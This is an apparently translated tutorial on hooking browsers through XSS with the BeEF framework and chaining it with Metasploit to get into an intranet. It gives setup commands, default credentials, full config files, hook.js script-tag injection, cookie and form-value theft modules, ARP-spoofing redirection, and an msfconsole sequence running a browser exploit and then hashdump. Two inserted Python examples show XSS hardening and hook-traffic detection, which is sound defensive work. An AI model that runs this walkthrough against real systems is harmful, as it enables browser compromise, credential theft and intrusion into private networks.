Intranet penetration, part 1: using an XSS vulnerability to reach the intranet
0x01 Background
BeEF is currently the most popular browser attack framework in Europe and America. Its full name is The Browser Exploitation Framework Project. BeEF uses a simple XSS vulnerability to plant a JavaScript file (hook.js) that takes control of the target host's browser; through that browser it collects detailed information about the host and can go on to scan the intranet. Combined with Metasploit it is a real killer for intranet penetration.
0x02 Installation
BeEF is not installed in Kali Linux by default; install it yourself:
apt-get update
apt-get install beef-xss
0x03 Getting started
0x03.1 Start
Main directory: /usr/share/beef-xss
cd /usr/share/beef-xss
./beef
Panel: http://127.0.0.1:3000/ui/panel
Account / password: beef / beef
Demo page: http://<beef-ip>:3000/demos/butcher/index.html
To check that the two hosts can talk to each other, open the BeEF demo page from the target. The demo page has hook.js embedded, so visiting it hooks the browser.
0x04 Trojan page
Add a script tag to a normal page to embed the malicious script.
In a real penetration (a public IP address is required), how do you get victims to open a page with hook.js embedded?
Website feedback and report pages are a classic case: an XSS there once landed someone in the back end of the Baidu complaint centre.
That author used an XSS platform rather than BeEF. With BeEF you not only get the back-end administrator's cookie; the administrator's browser can also be used, together with Metasploit, as a stepping stone into the company intranet.
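As an added defensive illustration (my own code, not part of the original article or of BeEF), here is the feedback-page pattern the case above describes, in Python: the vulnerable rendering that pastes visitor text into the administrator's view unchanged, next to the hardened version that encodes it and sends a Content-Security-Policy restricting where scripts may load from. The form text, the host name in the injected tag and the cookie name are constructed placeholders.

```python
import html
import re

# Constructed sample of what a visitor typed into a feedback form. The injected
# tag mirrors the technique the article describes (a <script src=...hook.js>
# planted where an administrator will open it); the host is a placeholder.
HOOK_TAG = '<script src="http://beef-host.invalid:3000/hook.js"></script>'
FEEDBACK = "Your report page is broken " + HOOK_TAG

# Page template used by the (hypothetical) admin feedback queue.
TEMPLATE = (
    "<html><body><h1>Feedback queue</h1>"
    "<div class=\"entry\">{body}</div></body></html>"
)


def render_vulnerable(feedback: str) -> str:
    """Stored-XSS pattern: the visitor's text is pasted into the page as markup.
    The admin's browser parses the <script> tag and fetches the hook."""
    return TEMPLATE.format(body=feedback)


def render_hardened(feedback: str) -> str:
    """Output encoding: <, >, &, " and ' become entities, so the same text is
    shown literally and never parsed as a tag."""
    return TEMPLATE.format(body=html.escape(feedback, quote=True))


def hardened_headers() -> dict:
    """Defence in depth for the admin view. The CSP allows scripts from the
    site's own origin only, so an injected tag pointing at another host is
    refused by the browser even if encoding is missed somewhere; HttpOnly keeps
    the session cookie out of reach of page scripts. Cookie name is constructed."""
    return {
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
        "Set-Cookie": "admin_session=<value>; HttpOnly; Secure; SameSite=Strict",
    }


# A <script ... src=...> tag that made it into the rendered HTML as real markup.
_EXTERNAL_SCRIPT = re.compile(r"<script\b[^>]*\bsrc\s*=", re.IGNORECASE)


def has_external_script(rendered: str) -> bool:
    """Check a test suite can run against rendered pages: did user input survive
    as a live <script src=...> tag? Encoded text (&lt;script) does not match."""
    return _EXTERNAL_SCRIPT.search(rendered) is not None


def demo() -> dict:
    """Which of the two renderings would make the browser load the foreign script."""
    return {
        "vulnerable": has_external_script(render_vulnerable(FEEDBACK)),
        "hardened": has_external_script(render_hardened(FEEDBACK)),
    }


if __name__ == "__main__":
    print(demo())
    print(hardened_headers()["Content-Security-Policy"])
```

The two fixes are independent: encoding stops the text from becoming markup at all, while the CSP means that even a tag that slips through somewhere else in the application cannot pull a script from a host other than the site itself.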
Online Browsers -> right-click -> Use As Proxy.
Combined with ARP spoofing and a man-in-the-middle attack, basically every HTTP request on the internal network can be redirected... (insert knowing smile here)
The BeEF panel shows a host coming online (it feels just like the Gray Pigeon RAT back in the day =. =).
Through the browser we can see a lot of information about the target host:
Browser information: name, version, User-Agent string, platform, window size
Plug-ins: Flash, VBScript, WebSocket, QuickTime, ...
API info, cookies, OS info, date
Hardware info: CPU (32/64-bit), screen resolution, touch-screen support
And so on.
Tested with Firefox.
BeEF function modules
Common modules:
Browser: get browser information
  Hooked Domain:
    Get Cookie: read the client's cookies; run the command and the cookie is displayed on the right
    Get Form Values: read the form data submitted on the page, e.g. intercepted bank card details or the username and password on a registration page
    Redirect Browser: redirect the browser
Once executed, the target browser is redirected to bobao.360.cn, or to any site you choose. In a real penetration you would run ARP spoofing on the intranet and redirect all HTTP traffic to the page with the hook script embedded... (lustful smile here)
Chrome Extensions
Debug: test HTTP requests
Exploits: attack the host through browser vulnerabilities
Host: get victim host information
Metasploit: penetration with Metasploit, the focus of this article
Network: DoSer, ping, DNS enumeration, port scanning, etc.
Social Engineering: social engineering module
0x05 Integration with Metasploit
BeEF configuration file: /usr/share/beef-xss/config.yaml
Change
metasploit:
    enable: false
to
metasploit:
    enable: true
Two files are involved: the main config.yaml and the Metasploit extension's own config.yaml; both are reproduced below.
Main config.yaml:

# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# BeEF Configuration file

beef:
    version: '0.4.4.5-alpha'
    debug: false

    restrictions:
        # subnet of browser ip addresses that can hook to the framework
        permitted_hooking_subnet: "0.0.0.0/0"
        # subnet of browser ip addresses that can connect to the UI
        # permitted_ui_subnet: "127.0.0.1/32"
        permitted_ui_subnet: "0.0.0.0/0"

    http:
        debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
        host: "0.0.0.0"
        port: "3000"
        # Decrease this setting up to 1000 if you want more responsiveness when sending modules and retrieving results.
        # It's not advised to decrease it with tons of hooked browsers (more than 50),
        # because it might impact performance. Also, enable WebSockets is generally better.
        xhr_poll_timeout: 5000
        # if running behind a nat set the public ip address here
        #public: ""
        #public_port: "" # port setting is experimental

        # DNS
        dns_host: "localhost"
        dns_port: 53

        panel_path: "/ui/panel"
        hook_file: "/hook.js"
        hook_session_name: "BEEFHOOK"
        session_cookie_name: "BEEFSESSION"

        # Allow one or multiple domains to access the RESTful API using CORS
        # For multiple domains use: "http://browserhacker.com, http://domain2.com"
        restful_api:
            allow_cors: false
            cors_allowed_domains: "http://browserhacker.com"

        # Prefer WebSockets over XHR-polling when possible.
        websocket:
            enable: false
            secure: true # use WebSocketSecure work only on https domain and whit https support enabled in BeEF
            port: 61985 # WS: good success rate through proxies
            secure_port: 61986 # WSSecure
            ws_poll_timeout: 1000 # poll BeEF every second

        # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
        web_server_imitation:
            enable: true
            type: "apache" #supported: apache, iis

        # Experimental HTTPS support for the hook / admin / all other Thin managed web services
        https:
            enable: false
            # In production environments, be sure to use a valid certificate signed for the value
            # used in beef.http.dns_host (the domain name of the server where you run BeEF)
            key: "beef_key.pem"
            cert: "beef_cert.pem"

    database:
        # For information on using other databases please read the
        # README.databases file

        # supported DBs: sqlite, mysql, postgres
        # NOTE: you must change the Gemfile adding a gem require line like:
        # gem "dm-postgres-adapter"
        # or
        # gem "dm-mysql-adapter"
        # if you want to switch drivers from sqlite to postgres (or mysql).
        # Finally, run a 'bundle install' command and start BeEF.
        driver: "sqlite"

        # db_file is only used for sqlite
        db_file: "db/beef.db"

        # db connection information is only used for mysql/postgres
        db_host: "localhost"
        db_port: 5432
        db_name: "beef"
        db_user: "beef"
        db_passwd: "beef123"
        db_encoding: "UTF-8"

    # Credentials to authenticate in BeEF.
    # Used by both the RESTful API and the Admin_UI extension
    credentials:
        user: "beef"
        passwd: "beef"

    # Autorun modules as soon the browser is hooked.
    # NOTE: only modules with target type 'working' or 'user_notify' can be run automatically.
    autorun:
        enable: true
        # set this to FALSE if you don't want to allow auto-run execution for modules with target->user_notify
        allow_user_notify: true

    crypto_default_value_length: 80

    # Enable client-side debugging
    client:
        debug: false

    # You may override default extension configuration parameters here
    extension:
        requester:
            enable: true
        proxy:
            enable: true
        metasploit:
            enable: true
        social_engineering:
            enable: true
        evasion:
            enable: false
        console:
            shell:
                enable: false
        ipec:
            enable: true
Metasploit extension config.yaml:

# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# Enable MSF by changing extension:metasploit:enable to true
# Then set msf_callback_host to be the public IP of your MSF server
#
# Ensure you load the xmlrpc interface in Metasploit
# msf > load msgrpc ServerHost=10.211.55.2 Pass=abc123 ServerType=Web
# Please note that the ServerHost parameter must have the same value of host and callback_host variables here below.
# Also always use the IP of your machine where MSF is listening.
beef:
    extension:
        metasploit:
            name: 'Metasploit'
            enable: true
            host: "172.16.244.129"
            port: 55552
            user: "msf"
            pass: "abc123"
            uri: '/api'
            ssl: false
            ssl_version: 'SSLv3'
            ssl_verify: true
            callback_host: "172.16.244.129"
            autopwn_url: "autopwn"
            auto_msfrpcd: false
            auto_msfrpcd_timeout: 120
            msf_path: [
              {os: 'osx', path: '/opt/local/msf/'},
              {os: 'livecd', path: '/opt/metasploit-framework/'},
              {os: 'bt5r3', path: '/opt/metasploit/msf3/'},
              {os: 'bt5', path: '/opt/framework3/msf3/'},
              {os: 'backbox', path: '/opt/metasploit3/msf3/'},
              {os: 'win', path: 'c:\\metasploit-framework\\'},
              {os: 'custom', path: '/usr/share/metasploit-framework/'}
            ]
Set host and callback_host to the BeEF host's IP address.
Restart the PostgreSQL and Metasploit services:
service postgresql restart && service metasploit restart
msfconsole   # start Metasploit
load msgrpc ServerHost=172.16.244.129 Pass=abc123
Restart BeEF. On start-up it reports that 246 Metasploit exploits were loaded; an MSF updated to the latest version should have 500 or 600.
Enter the BeEF panel (which, inexplicably, shows 245 =. =!)
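As an added defensive example (my own code, not the article's or BeEF's), the settings in the main config.yaml above give a blue team something concrete to look for: every hooked browser first fetches hook_file (/hook.js) and then, with WebSockets disabled as in this config, polls the BeEF host every xhr_poll_timeout milliseconds (5000) carrying its hook session id (BEEFHOOK). The Python below runs those checks over constructed proxy log lines. The log format, the client and server addresses and the polling path /dh are constructed assumptions; only the hook file name, the parameter name and the polling interval come from the config.

```python
from collections import defaultdict
from statistics import median
from urllib.parse import urlparse, parse_qs

# Values from BeEF's main config.yaml (beef.http section).
HOOK_FILE = "/hook.js"
HOOK_SESSION_NAME = "BEEFHOOK"
XHR_POLL_TIMEOUT_MS = 5000

# Constructed proxy log, not real traffic. One request per line:
#   <epoch seconds> <client ip> <method> <url> <status>
# 10.0.0.21 fetches the hook and then polls every 5 s; 10.0.0.22 is normal browsing.
SAMPLE_LOG = """\
1700000000 10.0.0.21 GET http://intranet.example/portal/ 200
1700000001 10.0.0.21 GET http://203.0.113.5:3000/hook.js 200
1700000006 10.0.0.21 GET http://203.0.113.5:3000/dh?BEEFHOOK=c0ffee 200
1700000011 10.0.0.21 GET http://203.0.113.5:3000/dh?BEEFHOOK=c0ffee 200
1700000016 10.0.0.21 GET http://203.0.113.5:3000/dh?BEEFHOOK=c0ffee 200
1700000021 10.0.0.21 GET http://203.0.113.5:3000/dh?BEEFHOOK=c0ffee 200
1700000003 10.0.0.22 GET http://intranet.example/news/ 200
1700000300 10.0.0.22 GET http://intranet.example/news/2 200
"""


def parse_line(line: str) -> dict:
    """Split one constructed log line into its five fields."""
    ts, client, method, url, status = line.split()
    return {"ts": int(ts), "client": client, "method": method,
            "url": url, "status": int(status)}


def request_indicators(rec: dict) -> list:
    """Per-request signals: the hook file itself, or the hook session id in the query."""
    u = urlparse(rec["url"])
    reasons = []
    if u.path.endswith(HOOK_FILE):
        reasons.append("hook file requested")
    if HOOK_SESSION_NAME in parse_qs(u.query):
        reasons.append("hook session id in query string")
    return reasons


def find_polling(records, period_ms=XHR_POLL_TIMEOUT_MS, tolerance=0.25, min_requests=4):
    """Behavioural signal that does not depend on URL names: a client talking to
    one host:port at a steady interval close to the XHR poll timeout.
    Returns {(client, host:port): median gap in seconds}."""
    stamps = defaultdict(list)
    for r in records:
        stamps[(r["client"], urlparse(r["url"]).netloc)].append(r["ts"])
    period = period_ms / 1000
    hits = {}
    for key, ts in stamps.items():
        if len(ts) < min_requests:
            continue
        ts.sort()
        gaps = [b - a for a, b in zip(ts, ts[1:])]
        m = median(gaps)
        if abs(m - period) <= tolerance * period:
            hits[key] = m
    return hits


def analyse(log_text: str) -> dict:
    """Run both checks over a log and return what they flagged."""
    records = [parse_line(l) for l in log_text.splitlines() if l.strip()]
    flagged = []
    for r in records:
        reasons = request_indicators(r)
        if reasons:
            flagged.append((r["client"], r["url"], reasons))
    return {"flagged_requests": flagged, "polling": find_polling(records)}


if __name__ == "__main__":
    result = analyse(SAMPLE_LOG)
    for client, url, reasons in result["flagged_requests"]:
        print(f"{client} {url}: {', '.join(reasons)}")
    for (client, server), gap in result["polling"].items():
        print(f"{client} polls {server} every ~{gap:.0f}s")
```

The name-based checks are cheap but brittle: hook_file and hook_session_name are just config values and can be renamed, and with websocket enabled the polling moves to port 61985 instead of HTTP requests. The interval check is the one worth keeping in a detection rule set, tuned to whatever poll period you actually observe.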
use exploit/windows/browser/ie_execcommand_uaf
show options
set srvhost 172.16.244.129
exploit (or run)
The target browser is forcibly redirected to the URL MSF is listening on.
MSF sees the browser hit the exploit (however, the XP install on the virtual machine seems to have been patched against this vulnerability, so no session is generated).
If XP is unpatched the vulnerability exists, this exploit works and a session is generated.
sessions -i 1
screenshot: capture the victim's screen to a local file
sysinfo: view system information
hashdump: dump the user password hashes of the target host